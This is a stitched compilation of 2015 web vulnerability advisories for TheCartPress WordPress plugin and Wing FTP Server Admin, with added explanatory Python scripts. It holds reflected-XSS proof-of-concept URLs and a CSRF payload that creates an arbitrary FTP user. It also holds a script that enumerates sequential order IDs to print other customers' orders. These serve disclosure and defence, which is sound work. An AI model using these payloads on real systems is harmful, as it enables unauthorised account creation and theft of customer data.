http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&lastname=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&street=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&city=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&postcode=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AddressEdit.php&email=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E

4.3 Input passed via the "post_id" and "rel_type" GET parameters to "/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php" is not properly sanitised before being returned to the user.

A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E
http://wordpress/wp-admin/admin.php?page=thecartpress/admin/AssignedCategoriesList.php&post_id=1&rel_type=%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E

4.4 Input passed via the "post_type" GET parameter to "/wp-admin/admin.php?page=thecartpress/admin/CustomFieldsList.php" is not properly sanitised before being returned to the user.

A remote attacker can trick a logged-in administrator into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.

http://wordpress/wp-admin/admin.php?page=thecartpress/admin/CustomFieldsList.php&post_type=1--%3E%27%22%3E%3Cscript%3Ealert%28%27immuniweb%27%29;%3C/script%3E

-----------------------------------------------------------------------------------------------

Solution:

2015-04-08 Vendor Alerted via emails.
2015-04-17 Vendor Alerted via contact form and emails.
2015-04-17 Vendor Alerted via WordPress Support Forums.
2015-04-27 Fix Requested via emails.
2015-04-29 Public disclosure.

Currently we are not aware of any official solution for this vulnerability. According to the vendor the plugin will not be supported anymore from 1 June 2015: http://thecartpress.com/extend/important-note-nota-importante/

We recommend disabling or removing the vulnerable plugin as a workaround.

-----------------------------------------------------------------------------------------------

References:

[1] High-Tech Bridge Advisory HTB23254 - https://www.htbridge.com/advisory/HTB23254 - Multiple vulnerabilities in TheCartPress WordPress plugin.
[2] TheCartPress WordPress plugin - http://thecartpress.com/ - Professional WordPress eCommerce Plugin. Use it as Shopping Cart, Catalog or Framework.
[3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
[4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.
[5] ImmuniWeb® SaaS - https://www.htbridge.com/immuniweb/ - hybrid of manual web application penetration test and cutting-edge vulnerability scanner available online via a Software-as-a-Service (SaaS) model.

-----------------------------------------------------------------------------------------------

Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.
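The two-step order retrieval from section 3 of the advisory, as an added example (this is not the advisory's or TheCartPress's code): a probe that walks predicted sequential order IDs through the checkout URL and then the admin-ajax print URL. Two things are assumed that the page does not state: the two requests must share one cookie session, and an order that cannot be printed comes back as an empty body or as WordPress's bare `0` admin-ajax reply. `make_fake_fetch` is a constructed stand-in for a vulnerable site so the script runs offline.

```python
"""Probe for the sequential order-ID access-control flaw (CVE-2015-3302).

Added example, not code from the advisory or from TheCartPress. Assumptions
not stated on the page: the two requests must share one cookie session, and an
order that is not printable comes back as an empty body or WordPress's bare
"0" admin-ajax reply.
"""
import http.cookiejar
from urllib.parse import parse_qs, urlencode, urlsplit
from urllib.request import HTTPCookieProcessor, build_opener


def order_urls(base, order_id):
    """The two URLs named in the advisory, in the order they must be requested."""
    checkout = urlencode({"tcp_checkout": "ok", "order_id": order_id})
    printer = urlencode({"order_id": order_id, "action": "tcp_print_order"})
    return (f"{base}/shopping-cart/checkout/?{checkout}",
            f"{base}/wp-admin/admin-ajax.php?{printer}")


def make_session_fetch(timeout=10):
    """Live fetcher: one cookie jar so step 1 and step 2 share a session (assumption)."""
    opener = build_opener(HTTPCookieProcessor(http.cookiejar.CookieJar()))

    def fetch(url):
        with opener.open(url, timeout=timeout) as resp:
            return resp.read().decode("utf-8", "replace")
    return fetch


def is_order_body(body):
    """Assumed failure signature: empty body or the bare '0' admin-ajax reply."""
    body = body.strip()
    return bool(body) and body != "0"


def fetch_order(base, order_id, fetch):
    """Step 1 (checkout URL) then step 2 (print URL); None if nothing printable."""
    checkout_url, print_url = order_urls(base, order_id)
    fetch(checkout_url)
    body = fetch(print_url)
    return body if is_order_body(body) else None


def enumerate_orders(base, start_id, count, fetch):
    """Walk predicted IDs (each new order is the previous ID + 1) and collect hits."""
    found = {}
    for oid in range(start_id, start_id + count):
        body = fetch_order(base, oid, fetch)
        if body is not None:
            found[oid] = body
    return found


def make_fake_fetch(orders):
    """Constructed stand-in for a vulnerable site, so the probe runs offline:
    it remembers the last order_id seen on the checkout URL and prints that
    order on the admin-ajax URL, mirroring the page's 'first open A, then B'."""
    state = {"unlocked": None}

    def fetch(url):
        qs = parse_qs(urlsplit(url).query)
        oid = int(qs["order_id"][0])
        if qs.get("tcp_checkout") == ["ok"]:
            state["unlocked"] = oid
            return ""
        if qs.get("action") == ["tcp_print_order"] and state["unlocked"] == oid:
            return orders.get(oid, "0")
        return "0"
    return fetch


if __name__ == "__main__":
    # Offline demo on constructed data; swap in make_session_fetch() for a live target.
    fake = make_fake_fetch({1001: "Order #1001 alice", 1003: "Order #1003 bob"})
    print(enumerate_orders("http://wordpress", 1000, 5, fake))
```

Against a live install, pass `make_session_fetch()` instead of the fake and stop at the first hit: the point is to confirm that an order the session never created can be printed, not to collect customer data. The fix belongs in the plugin, not in the probe: the `tcp_print_order` handler has to verify that the current user owns the order (or holds a capability that covers all orders) and the checkout URL must not grant a session access to an arbitrary `order_id`.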
25. Document Title:
===============
Wing FTP Server Admin 4.4.5 - CSRF & Cross Site Scripting Vulnerabilities

Release Date:
=============
2015-04-28

apparitionsec ID (AS-ID):
====================================
AS-WFTP0328

Common Vulnerability Scoring System:
====================================
Overall CVSS Score 8.9

Product:
===============================
Wing FTP Server is a web-based administration FTP client that supports the following protocols: FTP, FTPS, HTTPS, SSH.

Advisory Information:
==============================
Security researcher John Page discovered a CSRF & client-side cross site scripting web vulnerability within Wing FTP Server Admin that allows adding arbitrary users to the system.

Vulnerability Disclosure Timeline:
==================================
March 28, 2015: Vendor Notification
March 28, 2015: Vendor Response/Feedback
April 19, 2015: Vendor Notification
April 28, 2015: Vendor released new patched version 4.4.6
April 28, 2015: Public Disclosure - John Page

Affected Product(s):
====================
Wing FTP Server Admin 4.4.5
Product: Wing FTP Server - Admin

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Technical Details & Description:
================================
Request Method(s):
[+] POST & GET

Vulnerable Product:
[+] Wing FTP Server Admin 4.4.5

Vulnerable Parameter(s):
[+] domain & type

Affected Area(s):
[+] Server Admin

Proof of Concept (POC):
=======================
The CSRF and client-side cross site scripting web vulnerability can be exploited by remote attackers without a privileged application user account and with low user interaction (click). The payload will add an arbitrary user to the system.

POC: Example
http://localhost:5466/admin_loglist.html?domain=[CSRF & XSS VULNERABILITIES]

POC: Payload(s)
Add arbitrary user to the system:
http://localhost:5466/admin_loglist.html?domain=%3Cscript%3EajaxRequest%28%27admin_adduser%27,%22domain%3dtest%26user%3d{%27username%27%3a%27hyp3rlinx%27,%27password%27%3a%27kuQrwgV%27,%27oldpassword%27%3a%27%27,%27max_download%27%3a%270%27,%27max_upload%27%3a%270%27,%27max_download_account%27%3a%270%27,%27max_upload_account%27%3a%270%27,%27max_connection%27%3a%270%27,%27connect_timeout%27%3a%275%27,%27idle_timeout%27%3a%275%27,%27connect_per_ip%27%3a%270%27,%27pass_length%27%3a%270%27,%27show_hidden_file%27%3a0,%27change_pass%27%3a0,%27send_message%27%3a0,%27ratio_credit%27%3a%270%27,%27ratio_download%27%3a%271%27,%27ratio_upload%27%3a%271%27,%27ratio_count_method%27%3a0,%27enable_ratio%27%3a0,%27current_quota%27%3a%270%27,%27max_quota%27%3a%270%27,%27enable_quota%27%3a0,%27note_name%27%3a%27%27,%27note_address%27%3a%27%27,%27note_zip%27%3a%27%27,%27note_phone%27%3a%27%27,%27note_fax%27%3a%27%27,%27note_email%27%3a%27%27,%27note_memo%27%3a%27%27,%27ipmasks%27%3a[],%27filemasks%27%3a[],%27directories%27%3a[],%27usergroups%27%3a[],%27subdir_perm%27%3a[],%27enable_schedule%27%3a0,%27schedules%27%3a[],%27limit_reset_type%27%3a%270%27,%27limit_enable_upload%27%3a0,%27cur_upload_size%27%3a%270%27,%27max_upload_size%27%3a%270%27,%27limit_enable_download%27%3a0,%27cur_download_size%27%3a%270%27,%27max_download_size%27%3a%270%27,%27enable_expire%27%3a0,%27expiretime%27%3a%272015-05-18%2021%3a17%3a46%27,%27protocol_type%27%3a63,%27enable_password%27%3a1,%27enable_account%27%3a1,%27ssh_pubkey_path%27%3a%27%27,%27enable_ssh_pubkey_auth%27%3a0,%27ssh_auth_method%27%3a0}%22,%20%22post%22%29%3C/script%3E

POC XSS:
http://localhost:5466/admin_viewstatus.html?domain=

POC XSS:
http://localhost:5466/admin_event_list.html?type=

Solution - Fix & Patch:
=======================
Vendor released updated version 4.4.6 Fix/Patch (Wing FTP Server)

Security Risk:
==============
The security risk of the CSRF client-side cross site scripting web vulnerability in the `domain` admin_loglist.html value has a CVSS Score of 8.9.

Credits & Authors:
==================
John Page ( hyp3rlinx ) - ISR godz @apparitionsec

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. The security research reporter John Page disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. apparitionsec or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages.

Domains: hyp3rlinx.altervista.org
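Decoding the PoC URL above, as an added example that is not part of the advisory: the reflected `domain` parameter carries an inline script, and the script calls the admin page's own `ajaxRequest` helper (known here only from the payload; its internals are not on the page) to POST an `admin_adduser` request with the administrator's ambient session, which is what turns a reflected XSS into a CSRF that creates an account. `POC_URL` in the block is a trimmed copy of the page's payload with most of the user fields dropped.

```python
"""Decode the Wing FTP PoC URL to show the XSS-to-CSRF chain it carries.

Added example, not from the advisory. POC_URL is a trimmed copy of the page's
payload (most user fields dropped). ajaxRequest is the admin page's own helper
as the payload invokes it; its implementation is not known from the page.
"""
import ast
import re
from urllib.parse import parse_qs, urlsplit

# Constructed, shortened copy of the advisory's payload URL.
POC_URL = (
    "http://localhost:5466/admin_loglist.html?domain="
    "%3Cscript%3EajaxRequest%28%27admin_adduser%27,%22domain%3dtest%26user%3d"
    "{%27username%27%3a%27hyp3rlinx%27,%27password%27%3a%27kuQrwgV%27,"
    "%27enable_password%27%3a1,%27enable_account%27%3a1,%27protocol_type%27%3a63,"
    "%27ipmasks%27%3a[]}%22,%20%22post%22%29%3C/script%3E"
)

SCRIPT_RE = re.compile(r"<script>(.*?)</script>", re.S)
# ajaxRequest('<action>', "<form body>", "<method>") as written in the payload
CALL_RE = re.compile(r"ajaxRequest\('([^']+)',\s*\"([^\"]*)\",\s*\"([^\"]+)\"\)")


def reflected_parameter(url, name):
    """The query parameter value as the page receives it; None if absent."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return qs.get(name, [None])[0]


def decode_poc(url, param="domain"):
    """Return what the injected script does: action, method, target domain and
    the user object it submits. None when the parameter holds no ajaxRequest
    call (e.g. the bare reflection PoCs for admin_viewstatus / admin_event_list)."""
    value = reflected_parameter(url, param)
    script = SCRIPT_RE.search(value or "")
    if not script:
        return None
    call = CALL_RE.search(script.group(1))
    if not call:
        return None
    action, body, method = call.groups()
    fields = parse_qs(body, keep_blank_values=True)
    # The user object is a JS literal with single quotes; ast.literal_eval reads
    # it because the subset used (strings, ints, empty lists) is also valid Python.
    user = ast.literal_eval(fields["user"][0])
    return {
        "action": action,
        "method": method,
        "domain": fields["domain"][0],
        "user": user,
    }


if __name__ == "__main__":
    print(decode_poc(POC_URL))
```

The decoded object is the whole story of the bug: the browser runs attacker script in the admin origin because `domain` is written into the page unencoded, and the script reuses whatever request helper and authentication the admin UI already has. Output-encoding the reflected parameters closes the script injection; a per-session anti-CSRF token on `admin_adduser` is the second, independent layer that stops the forged request even if another reflection is found later.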